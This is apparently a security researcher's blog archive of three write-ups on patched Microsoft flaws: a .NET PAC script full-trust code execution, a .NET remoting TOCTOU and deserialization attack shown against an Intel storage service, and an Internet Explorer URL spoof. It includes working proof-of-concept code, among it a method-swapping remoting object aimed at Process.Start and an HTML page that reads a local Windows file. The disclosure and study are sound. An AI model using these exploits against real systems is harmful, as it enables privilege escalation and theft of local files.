Sunday 30 November 2014

Old .NET Vulnerability #1: PAC Script RCE (CVE-2012-4776)

This is the start of a very short series on some of my old .NET vulnerabilities which have been patched. Most of these issues have never been publicly documented, or at least there have been no PoCs made available. Hopefully it's interesting to some people.

The first vulnerability I'm going to talk about is CVE-2012-4776 which was fixed in MS12-074. It was an issue in the handling of Web Proxy Auto-Configuration (PAC) scripts. It was one of the only times that MS has ever credited me with an RCE in .NET since they made it harder to execute .NET code from IE. Though to be fair making it harder might be partially my fault.

The purpose of a PAC script, if you've never encountered one before, is to allow a web client to run some proxy-decision logic before it connects to a web server. An administrator can configure the script to make complex decisions on how outbound connections are made, for example forcing all external web sites through a gateway proxy while all intranet connections go directly to the server. You can read all about it on Wikipedia and many other sites, but the crucial thing to bear in mind is that the PAC script is written in Javascript. The most basic PAC script you can create is as follows:
function FindProxyForURL(url, host) {
 // Always return no proxy setting
 return "DIRECT";
}
On Windows, if you use the built-in HTTP libraries such as WinINET and WinHTTP you don't need to worry about these files yourself, but if you roll your own HTTP stack, like .NET does, you're on your own to reimplement this functionality. So when faced with this problem, what to do? If you answered "let's use a .NET implementation of Javascript" you'd be correct. Some people don't realise that .NET comes with its own implementation of Javascript (called JScript for licensing reasons). It even comes with a compiler, jsc.exe, installed by default.
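You don't even need to shell out to jsc.exe to see this; the same compiler is reachable through CodeDOM. Here's a minimal sketch of my own (the Hello class and its source string are illustrative) which compiles and runs a JScript.NET snippet from C#:

// Compile with a reference to Microsoft.JScript.dll.
using System;
using System.CodeDom.Compiler;
using Microsoft.JScript;

class JScriptCompileDemo
{
    static void Main()
    {
        // An illustrative JScript.NET class to compile at runtime.
        string source = @"
class Hello {
    static function Greet() : String {
        return ""Hello from JScript.NET"";
    }
}";
        var provider = new JScriptCodeProvider();
        var options = new CompilerParameters { GenerateInMemory = true };
        CompilerResults results = provider.CompileAssemblyFromSource(options, source);
        if (results.Errors.HasErrors)
            throw new InvalidOperationException("Compilation failed");

        // The output is an ordinary .NET assembly we can reflect over.
        Type type = results.CompiledAssembly.GetType("Hello");
        Console.WriteLine(type.GetMethod("Greet").Invoke(null, null));
    }
}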

While having a look at .NET, evaluating anything interesting which asserts full-trust permissions, I came across the .NET PAC implementation. The following method is from the System.Net.VsaWebProxyScript class in the Microsoft.JScript assembly (some code removed for brevity):
[PermissionSet(SecurityAction.Assert, Name="FullTrust")]
public bool Load(Uri engineScriptLocation, string scriptBody, Type helperType)
{
    try
    {
        engine = new VsaEngine();
        engine.RootMoniker = "pac-" + engineScriptLocation.ToString();
        engine.Site = new VsaEngineSite(helperType);
        engine.InitNew();
        engine.RootNamespace = "__WebProxyScript";

        StringBuilder sb = new StringBuilder();
        sb.Append("[assembly:System.Security.SecurityTransparent()] ...");
        sb.Append("class __WebProxyScript { ... }\r\n");
        sb.Append(scriptBody);
        IVsaCodeItem item2 = engine.Items.CreateItem("SourceText", 
                   VsaItemType.Code, VsaItemFlag.None) as IVsaCodeItem;
        item2.SourceText = sb.ToString();

        if (engine.Compile())
        {
            engine.Run();
            scriptInstance = Activator.CreateInstance(
                 engine.Assembly.GetType("__WebProxyScript.__WebProxyScript"));
            CallMethod(scriptInstance, "SetEngine", new object[] { engine });
            return true;
        }
    }
    catch
    {
    }
    return false;
}
The code is taking the PAC script from the remote location as a string, putting it together with some boilerplate code to implement the standard PAC functions, and compiling it to an assembly. This seems too good to be true from an exploit perspective. It was time to give it a try, so I configured a simple .NET application with a PAC script by adding the following configuration to the application:
<configuration>
  <system.net>
    <defaultProxy>
      <proxy autoDetect="true"
             scriptLocation="http://127.0.0.1/test.js" />
    </defaultProxy>
  </system.net>
</configuration>
Of course in a real-world scenario the application probably isn't going to be configured like this. Instead the proxy settings might be configured through WPAD (which is known to be spoofable) or through the system settings. When the application makes a connection using the System.Net.WebClient class it will load the PAC file from the scriptLocation and execute it.
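The test harness itself is nothing special; here's a hedged sketch, assuming the configuration above sits in the application's app.config and http://127.0.0.1/test.js serves the PAC script:

using System;
using System.Net;

class PacTestHarness
{
    static void Main()
    {
        // Any request through WebClient consults the default proxy settings,
        // which causes the configured PAC script to be fetched and run first.
        using (var client = new WebClient())
        {
            Console.WriteLine(client.DownloadString("http://www.example.com/"));
        }
    }
}

With the harness ready let's try a few things: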
import System;

function FindProxyForURL(url, host) {
 Console.WriteLine("Hello World!");
 return "DIRECT";
}
This printed out "Hello World!" as you'd expect, so we can compile and execute JScript.NET code. Awesome. So let's go for the win!
import System.IO;

function FindProxyForURL(url, host) {
 File.WriteAllText("test.txt", "Hello World!");
 return "DIRECT";
}
And... it fails, silently I might add :-( I guess we need to get to the bottom of this. When dealing with the internals of the framework I usually find it easiest to get WinDBG involved. Every version of the .NET framework comes with a handy debugger extension, SOS, which we can use to do low-level debugging of .NET code. A quick tutorial: open the .NET executable in WinDBG and run the following two lines at the console.
sxe clr
sxe -c ".loadby sos mscorwks; gh" ld:mscorwks
What these lines do is set WinDBG to stop on a CLR exception (.NET uses Windows SEH under the hood to pass on exceptions) and add a handler to load the SOS library when the mscorwks DLL gets loaded. This DLL is the main part of the CLR; we can't actually do any .NET debugging until the CLR is started. As a side note, if this were .NET 4 or above you'd replace mscorwks with clr, as that framework uses clr.dll as its main implementation.

Restarting the execution of the application we wait for the debugger to break on the CLR exception. Once we've broken into the debugger you can use the SOS command !pe to dump the current exception:


Well, no surprises: we got a SecurityException trying to open the file we specified. Now at this point it's clear that the PAC script must be running in Partial Trust (PT). This isn't necessarily an issue as I still had a few PT escapes to hand, but it would be nice not to need one. By dumping the call stack using the !clrstack command we can see that the original caller was System.Net.AutoWebProxyScriptWrapper.

Looking at the class confirms our suspicion that we're running in PT. In the class's CreateAppDomain method it creates an Internet-security AppDomain, which is going to be pretty limited in permissions, then initializes the System.Net.VsaWebProxyScript object inside it. As that class derives from MarshalByRefObject it doesn't leave the restricted AppDomain. Still, in situations like this you shouldn't be disheartened; let's go back and look at how the assembly was being loaded into memory. We find it's being loaded from a byte array (maybe bad) but passing a null for the evidence parameter (awesome). As we can see in the remarks for Assembly.Load this is a problem:
When you use a Load method overload with a Byte[] parameter to load a COFF image, 
evidence is inherited from the calling assembly. This applies to the .NET Framework 
version 1.1 Service Pack 1 (SP1) and subsequent releases.
So what we end up with is an assembly which inherits its permissions from the calling assembly. The calling assembly is trusted framework code, which means our compiled PAC code is also trusted code. So why doesn't the file function work? Well, you have to remember how security in AppDomains interacts with the security stack walk when a demand for a permission is requested.

The transition between the trusted and the untrusted AppDomains acts as a PermitOnly security boundary. What this means is that even if every caller on the current stack is trusted, if no-one asserts higher permissions than the AppDomain's current set then a demand would fail as shown in the below diagram:



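To make the boundary concrete, here's a small standalone sketch of my own using the era-appropriate CAS APIs (long obsolete in modern .NET). Even though every caller is fully trusted, the PermitOnly frame fails the demand:

using System;
using System.Security;
using System.Security.Permissions;

class PermitOnlyDemo
{
    static void Main()
    {
        // Emulate the restricted AppDomain's grant set: execution only.
        var restricted = new PermissionSet(PermissionState.None);
        restricted.AddPermission(
            new SecurityPermission(SecurityPermissionFlag.Execution));
        restricted.PermitOnly();

        try
        {
            // Every frame on the stack is fully trusted, but the PermitOnly
            // stops the walk unless something above it asserts.
            new FileIOPermission(PermissionState.Unrestricted).Demand();
        }
        catch (SecurityException)
        {
            Console.WriteLine("Demand failed at the PermitOnly boundary");
        }
    }
}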
There are plenty of ways around this situation; in fact we'll see a few in my next post on this topic. But for now there's an easy way past this issue: all we need is something to assert suitable permissions for us while we run our code. It turns out it was there all along; the original Load method uses the attribute form of permission assertion to assert full trust.
[PermissionSet(SecurityAction.Assert, Name="FullTrust")]
We can get code to run in that method because the loading of the assembly will execute any global JScript code automatically, so a quick modification and we get privileged execution:
import System.IO;

File.WriteAllText("test.txt", "Hello World!");

function FindProxyForURL(url, host) { 
 return "DIRECT";
}
Why couldn't we have just done a new PermissionSet(PermissionState.Unrestricted).Assert() here? Well, if you look at the code being generated for compilation it sets the SecurityTransparent assembly attribute. This tells the CLR that this code isn't allowed to elevate its permissions, but that it's transparent to security decisions. If you have a trusted assembly which is transparent it doesn't affect the stack walk at all, but it also cannot assert higher permissions. This is why the assertion in the Load method was so important. Of course this assertion was what originally led me to find the code in the first place.

Microsoft fixed this in two ways: first, they "fixed" the JScript code to not execute under a privileged permission set, as well as passing an appropriate evidence object to the assembly load. Secondly, they basically blocked the use of JScript.NET by default (see the notes in the KB article here). If you ever find a custom implementation of PAC scripts in an application it's always worth a quick look to see what they're using.


Monday 24 November 2014

Stupid is as Stupid Does When It Comes to .NET Remoting

Finding vulnerabilities in .NET is something I quite enjoy; it generally meets my criteria of only looking for logic bugs. Probably the first research I did was into .NET serialization, where I got some interesting results and my first Blackhat USA presentation slot. One of the places where you could abuse serialization was in .NET remoting, which is a technology similar to Java RMI or CORBA for accessing .NET objects remotely (or on the same machine using IPC). Microsoft consider it a legacy technology and you shouldn't use it, but that won't stop people.

One day I came to the realisation that while I'd talked about how dangerous it was I'd never released any public PoC for exploiting it. So I decided to start writing a simple tool to exploit vulnerable servers, that was my first mistake. As I wanted to fully understand remoting to write the best tool possible I decided to open my copy of Reflector, that was my second mistake. I then looked at the code, sadly that was my last mistake.

TL;DR you can just grab the tool and play. If you want a few of the sordid details of CVE-2014-1806 and CVE-2014-4149 then read on.

.NET Remoting Overview

Before I can describe what the bug is I need to describe how .NET remoting works a little bit. Remoting was built into the .NET framework from the very beginning. It supports a pluggable architecture where you can replace many of the pieces, but I'm just going to concentrate on the basic implementation and what's important from the perspective of the bug. MSDN has plenty of resources which go into a bit more depth and there's always the official documentation MS-NRTP and MS-NRBF. A good description is available here.

The basics of .NET remoting are as follows: you have a server class which is derived from the MarshalByRefObject class. This indicates to the .NET framework that this object can be called remotely. The server code can publish this server object using the remoting APIs such as RemotingConfiguration.RegisterWellKnownServiceType. On the client side a call can be made to APIs such as Activator.GetObject which will establish a transparent proxy for the client. When the client makes a call on this proxy the method information and parameters are packaged up into an object which implements the IMethodCallMessage interface. This object is sent to the server, which processes the message, calls the real method and returns the return value (or exception) inside an object which implements the IMethodReturnMessage interface.
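To make that concrete, here's a minimal self-contained sketch of my own (EchoServer, the port and the URI are illustrative names, not from any real service); run it once with a server argument, then again as the client:

// Compile with a reference to System.Runtime.Remoting.dll.
using System;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Tcp;

// Deriving from MarshalByRefObject marks the class as remotable.
public class EchoServer : MarshalByRefObject
{
    public string Echo(string s) { return "echo: " + s; }
}

class RemotingDemo
{
    static void Main(string[] args)
    {
        if (args.Length > 0 && args[0] == "server")
        {
            ChannelServices.RegisterChannel(new TcpChannel(9999), false);
            RemotingConfiguration.RegisterWellKnownServiceType(
                typeof(EchoServer), "Echo.rem", WellKnownObjectMode.Singleton);
            Console.ReadLine(); // keep the server alive
        }
        else
        {
            // The client gets a transparent proxy; calls go over the wire.
            var proxy = (EchoServer)Activator.GetObject(
                typeof(EchoServer), "tcp://localhost:9999/Echo.rem");
            Console.WriteLine(proxy.Echo("hello"));
        }
    }
}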

When a remoting session is constructed we need to create a couple of Channels, a Client Channel for the client and a Server Channel for the server. Each channel contains a number of pluggable components called sinks. A simple example is shown below:


The transport sinks are unimportant for the vulnerability. These sinks are used to actually transport the data in some form, for example as binary over TCP. The important things to concentrate on from the perspective of the vulnerabilities are the Formatter Sinks and the StackBuilder Sink.

Formatter sinks take the IMethodCallMessage or IMethodReturnMessage objects and format their contents so that they can be sent across the transport. They're also responsible for unpacking the result at the other side. As the operations are asymmetric from the channel perspective there are two different formatter sink interfaces, IClientChannelSink and IServerChannelSink.

While you can select your own formatter sink, the framework will almost always give you a formatter based on the BinaryFormatter object which, as we know, can be pretty dangerous due to the potential for deserialization bugs. The client sink is implemented in BinaryClientFormatterSink and the server sink is BinaryServerFormatterSink.
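As a reminder of why that's dangerous: deserialization is not a passive operation, the incoming stream decides which types get instantiated, and those types get to run code. A trivial self-contained illustration of my own (not exploit code):

using System;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;

[Serializable]
public class Payload : IDeserializationCallback
{
    // Invoked automatically by the formatter when the object graph
    // containing this type is deserialized.
    public void OnDeserialization(object sender)
    {
        Console.WriteLine("code ran during deserialization");
    }
}

class DeserializeDemo
{
    static void Main()
    {
        var formatter = new BinaryFormatter();
        var stream = new MemoryStream();
        formatter.Serialize(stream, new Payload());
        stream.Position = 0;
        // The stream, not the receiver, picked the Payload type.
        formatter.Deserialize(stream);
    }
}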

The StackBuilder sink is an internal-only class implemented by the framework for the server. Its job is to unpack the IMethodCallMessage information, find the destination server object to call, verify the security of the call, call the server and finally package up the return value into the IMethodReturnMessage object.

This is a very high level overview, but we'll see how this all interacts soon.

The Exploit

Okay so on to the actual vulnerability itself, let's take a look at how the BinaryServerFormatterSink processes the initial .NET remoting request from the client in the ProcessMessage method:

IMessage requestMsg;
PermissionSet set = null;

if (this.TypeFilterLevel != TypeFilterLevel.Full)
{
     set = new PermissionSet(PermissionState.None);
     set.SetPermission(
           new SecurityPermission(SecurityPermissionFlag.SerializationFormatter));
}
try
{
    if (set != null)
    {
        set.PermitOnly();
    }
    requestMsg = CoreChannel.DeserializeBinaryRequestMessage(uRI, requestStream, 
               _strictBinding, TypeFilterLevel);
}
finally
{
    if (set != null)
    {
         CodeAccessPermission.RevertPermitOnly();
    }
}
We can see in this code that the request data from the transport is thrown into the DeserializeBinaryRequestMessage. The code around it is related to the serialization type filter level which I'll describe later. So what's the method doing?
internal static IMessage DeserializeBinaryRequestMessage(string objectUri, 
              Stream inputStream, bool bStrictBinding, TypeFilterLevel securityLevel)
{
    BinaryFormatter formatter = CreateBinaryFormatter(false, bStrictBinding);
    formatter.FilterLevel = securityLevel;
    UriHeaderHandler handler = new UriHeaderHandler(objectUri);
    return (IMessage) formatter.UnsafeDeserialize(inputStream, 
              new HeaderHandler(handler.HeaderHandler));
}

For all intents and purposes it isn't doing a lot. It's passing the request stream to a BinaryFormatter and returning the result. The result is cast to an IMessage interface and the object is passed on for further processing. Eventually it ends up passing the message to the StackBuilder sink, which verifies the method being called is valid then executes it. Any result is passed back to the client.

So now for the bug: it turns out that nothing checked that the result of the deserialization was a local object. Could we instead insert a remote IMethodCallMessage object into the serialized stream? It turns out yes we can. Serializing an object which implements the interface but is also derived from MarshalByRefObject serializes an instance of an ObjRef class which points back to the client.

But why would this be useful? Well, it turns out there's a Time-of-Check Time-of-Use (TOCTOU) vulnerability if an attacker can return different results for the MethodBase property. By returning a MethodBase for Object.ToString (which is always allowed) at some points, it will trick the server into dispatching the call. Then, once the StackBuilder sink goes to dispatch the method, we replace it with something more dangerous, say Process.Start instead, and you've got arbitrary code execution in the remoting service.
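To show the shape of such an object, here's an illustrative sketch of my own. This is not the actual exploit (the real attack has to hand-roll the remoting wire format per MS-NRTP; see the github project), and the names and the calc.exe argument are hypothetical:

using System;
using System.Collections;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.Remoting.Messaging;

// Deriving from MarshalByRefObject means serializing this sends an ObjRef
// pointing back at the attacker, so the server's property reads come to us.
public class FlippingMethodCall : MarshalByRefObject, IMethodCallMessage
{
    private int _reads;

    // The TOCTOU core: the first read (the check) sees the harmless
    // Object.ToString, later reads (the dispatch) see Process.Start.
    public MethodBase MethodBase
    {
        get
        {
            return _reads++ == 0
                ? typeof(object).GetMethod("ToString", Type.EmptyTypes)
                : typeof(Process).GetMethod("Start", new[] { typeof(string) });
        }
    }

    public object[] Args { get { return new object[] { "calc.exe" }; } }
    public int ArgCount { get { return 1; } }
    public object GetArg(int i) { return Args[i]; }
    public string GetArgName(int i) { return "arg" + i; }
    public object[] InArgs { get { return Args; } }
    public int InArgCount { get { return 1; } }
    public object GetInArg(int i) { return Args[i]; }
    public string GetInArgName(int i) { return "arg" + i; }
    public string MethodName { get { return "ToString"; } }
    public string TypeName { get { return typeof(object).AssemblyQualifiedName; } }
    public object MethodSignature { get { return new[] { typeof(string) }; } }
    public string Uri { get { return "Server.rem"; } }
    public bool HasVarArgs { get { return false; } }
    public LogicalCallContext LogicalCallContext { get { return null; } }
    public IDictionary Properties { get { return new Hashtable(); } }
}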

In order to actually exploit this you pretty much need to implement most of the remoting code manually; fortunately it is documented, so that doesn't take very long. You can repurpose the existing .NET BinaryFormatter code to do most of the other work for you. I'd recommend taking a look at the github project for more information on how this all works.

So that was CVE-2014-1806, but what about CVE-2014-4149? Well, it's the same bug; MS didn't fix the TOCTOU issue, instead they added a call to RemotingServices.IsTransparentProxy just after the deserialization. Unfortunately that isn't the only way you can get a remote object from deserialization. .NET supports quite extensive COM interop and, as luck would have it, all the IMessage interfaces are COM accessible. So instead of a remoting object we inject a COM implementation of the IMethodCallMessage interface (which ironically can be written in .NET anyway). This works best locally, as then you don't need to worry so much about COM authentication, but it should work remotely. The final fix was to check whether the object returned is an instance of MarshalByRefObject; as it turns out the transparent COM object, System.__ComObject, derives from that class, as do transparent proxies.

Of course if the service is running with a TypeFilterLevel set to Full then even with these fixes the service can still be vulnerable. In this case you can deserialize anything you like in the initial remoting request to the server. Then, with some object trickery, you can capture FileInfo or DirectoryInfo objects which give access to the filesystem with the privileges of the server. The reason you can do this is that these objects are both serializable and derived from MarshalByRefObject. So you can send them to the server serialized, but when the server tries to reflect them back to the client they end up staying in the server as remote objects.
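You can verify the property that makes this work in a couple of lines (a quick check of my own):

using System;
using System.IO;

class FileInfoCheck
{
    static void Main()
    {
        // Both conditions hold, which is exactly what the trick relies on.
        Console.WriteLine(typeof(FileInfo).IsSerializable);        // True
        Console.WriteLine(typeof(MarshalByRefObject)
            .IsAssignableFrom(typeof(FileInfo)));                  // True
    }
}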

Real-World Example

Okay, let's see this in action in a real-world application. I bought a computer a few years back which came with the Intel Rapid Storage Technology drivers version 11.0.0.1032 pre-installed (the specific version can be downloaded here). This contains a vulnerable .NET remoting server which we can exploit locally to get local system privileges. A note before I continue: from what I can tell the latest versions of these drivers no longer use .NET remoting for the communication between the user client and the server, so I've never contacted Intel about the issue. That said there's no automatic update process, so if, like me, you had the original insecure version installed, well, you have a trivial local privilege escalation on your machine :-(

Bringing up Reflector and opening the IAStorDataMgrSvc.exe application (which is the local service) we can find the server side of the remoting code below:

public void Start()
{
    BinaryServerFormatterSinkProvider serverSinkProvider =
        new BinaryServerFormatterSinkProvider {
            TypeFilterLevel = TypeFilterLevel.Full
        };
    BinaryClientFormatterSinkProvider clientSinkProvider = new BinaryClientFormatterSinkProvider();
    IdentityReferenceCollection groups = new IdentityReferenceCollection();

    IDictionary properties = new Hashtable();
    properties["portName"] = "ServerChannel";
    properties["includeVersions"] = "false";
    mChannel = new IpcChannel(properties, clientSinkProvider, serverSinkProvider);
    ChannelServices.RegisterChannel(mChannel, true);
    mServerRemotingRef = RemotingServices.Marshal(mServer,
        "Server.rem", typeof(IServer));
    mEngine.Start();
}

So there are a few things to note about this code: it's using IpcChannel, so it's going over named pipes (reasonable for a local service). It sets the portName to ServerChannel, which is the name of the named pipe on the local system. It then registers the channel with the secure flag set to true, and finally it exposes an object on the channel with the well-known name Server.rem. Also worth noting, it sets the TypeFilterLevel to Full; we'll get back to that in a minute.

For exploitation purposes, therefore, we can build the service URL as ipc://ServerChannel/Server.rem. So let's try sending it a command. In this case I had updated for the fix to CVE-2014-1806 but not for CVE-2014-4149, so we need to pass the -usecom flag to use a COM return channel.
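Under the hood any client, my tool included, is doing something like the following hedged sketch to get a proxy to the service; IServer here is a hypothetical stand-in for the interface defined in the service's own assemblies:

using System;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Ipc;

// Hypothetical placeholder for the service contract.
interface IServer { }

class ProbeServer
{
    static void Main()
    {
        // The default constructor gives us a client-only IPC channel.
        ChannelServices.RegisterChannel(new IpcChannel(), false);
        object proxy = Activator.GetObject(typeof(IServer),
            "ipc://ServerChannel/Server.rem");
        // True: we have a transparent proxy (the pipe itself is only
        // opened when the first method call is made).
        Console.WriteLine(RemotingServices.IsTransparentProxy(proxy));
    }
}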


Well, running the tool was easy: direct code execution at local system privileges. But of course if we now update to the latest version it will stop working again. Fortunately, though, I highlighted that they were setting the TypeFilterLevel to Full. This means we can still attack it using arbitrary deserialization. So let's try to do that instead:


In this case we know the service's directory and can upload our custom remoting server to the same directory the server executes from. This allows us to get full access to the system. If we don't know where the server is running from, we can still use the -useser flag to list and modify the file system (with the privileges of the server), so exploitation might still be possible.

Mitigating Against Attacks

I can't be 100% certain there aren't other ways of exploiting this sort of bug; at the least I can't rule out bypassing the TypeFilterLevel stuff through one trick or another. Still, there are definitely a few ways of mitigating it. One is to not use remoting; MS has deprecated the technology in favour of WCF, but isn't getting rid of it yet.

If you have to use remoting you could use secure mode with user account checking. Also, if you have complete control over the environment, you could randomise the service name per-deployment, which would at least prevent mass exploitation; a sketch of such a registration follows. An outbound firewall would also come in handy to block outgoing back channels.
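As a sketch of what I mean, assuming the same IpcChannel setup as the Intel service above (the group name and GUID-suffixed port are illustrative choices, not a vendor recommendation):

using System;
using System.Collections;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Ipc;

class HardenedSetup
{
    static void Main()
    {
        IDictionary props = new Hashtable();
        // A randomised pipe name frustrates mass exploitation (it would
        // need to be persisted and discoverable by legitimate clients).
        props["portName"] = "ServerChannel-" + Guid.NewGuid();
        // Restrict which accounts may connect to the pipe at all.
        props["authorizedGroup"] = "Administrators";
        var channel = new IpcChannel(props, null, null);
        // ensureSecurity = true forces authentication on the channel.
        ChannelServices.RegisterChannel(channel, true);
        // ... register the well-known service type as before ...
    }
}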


Tuesday 11 November 2014

When's document.URL not document.URL? (CVE-2014-6340)

I don't tend to go after cross-origin bugs in web browsers, after all XSS is typically far easier to find (*disclaimer* I don't go after XSS either), but sometimes they're fun. Internet Explorer is a special case; most web browsers don't make much of a distinction between origins for security purposes, but IE does. Its zone mechanisms can make cross-origin bugs interesting, especially when they interact with ActiveX plugins. The origin *ahem* of CVE-2014-6340 came from some research into a site-locking ActiveX plugin. I decided to see if I could find a generic way of bypassing the site-lock and found a bug in IE which has existed since at least IE6.

Let's start with how an ActiveX control will typically site-lock, as in only allow the control to be interacted with if hosted on a page from a particular domain. When an ActiveX control is instantiated it's passed a "Site" object which represents the container of the ActiveX control. This might be through implementing IObjectWithSite::SetSite or IOleObject::SetClientSite. When passed the site object, the well-known way of getting the hosting page's URL is to call the IHTMLDocument2::get_URL method with code similar to the following:
IOleClientSite* pOleClientSite;
IOleContainer* pContainer;
pOleClientSite->GetContainer(&pContainer);

IHTMLDocument2* pHtmlDoc;
pContainer->QueryInterface(IID_PPV_ARGS(&pHtmlDoc));

BSTR bstrURL;
pHtmlDoc->get_URL(&bstrURL);
// We now have the hosting URL.
Anything which is based on the published Microsoft site-locking template code does something similar. So we can conclude that for a site-locking ActiveX control the document.URL property is important. Even though this is a DOM property it's implemented at the native-code level, so you can't use Javascript to override it. So I guess we need to dig into MSHTML to find out where the URL value comes from. Bringing up the function in IDA led me to the following:



One of the first things IHTMLDocument2::get_URL calls is CMarkup::GetMarkupPrintUri. But what's most interesting is that if this returns successfully it exits the function with a successful return code. Of course, if you look at the code flow, it only enters that block of code if the markup document object returned from CDocument::Markup has bit 1 set at byte offset 0x31. So where does that get set? Well, annoyingly, 0x31 is hardly a rare number, so doing an immediate search in IDA was a pain. Still, eventually I found where you could set it: in the IHTMLDocument4::put_media function:


Still clearly that function must be documented? Nope, not a bit of it:



Well, I could go on but I'll cut the story short for sanity's sake. What the media property does is set whether the document is currently an HTML document or a print template. It turns out this is an old property which probably should never be used, but it's one of those things which is kept around for legacy purposes. As long as you convert the current document to a print template, using the OLECMDID_SETPRINTTEMPLATE command to ExecWB on the web browser, this code path will execute.

The final step is working out how you influence the URL property. After a bit of digging you'll find the following code in CMarkup::FindMarkupPrintUri:



Hmm, well, it seems to be reading the attribute __IE_DisplayURL from the top element of the document and returning that as the URL. Okay, let's try that, using something like XMLHttpRequest to see if we can read local files. For example:

<html __IE_DisplayURL="file:///c:/">
<body>
<h1>PoC for IE_DisplayURL Issue</h1>
<object border="1" classid="clsid:8856f961-340a-11d0-a96b-00c04fd705a2" id="obj">NO OBJECT</object>
<script>
try {
 // Set document to a print template
 var wb = document.getElementById("obj").object;
 wb.ExecWB(51, 0, true);

 // Enable print media mode
 document.media = "print";

 // Read a local file
 var x = new ActiveXObject("msxml2.xmlhttp");
 x.open("GET", "file:///c:/windows/win.ini", false);
 x.send();
 alert(x.responseText);

 // Disable again to get scripting back (not really necessary)
 document.media = "screen";

} catch(e) {
 alert(e.message);
}
</script>
</body>
</html>
This example only works when running in the Intranet Zone, because it requires the ability to script the web browser. Can it be done from the Internet Zone? Probably ;-) In the end Microsoft classed this as an information disclosure, but is it? Well, probably, in a default installation of Windows. But mix in third-party ActiveX controls and you have the potential for RCE. Perhaps sit back with a cup of *Coffee* and think about what ActiveX controls might be interesting to play with ;-)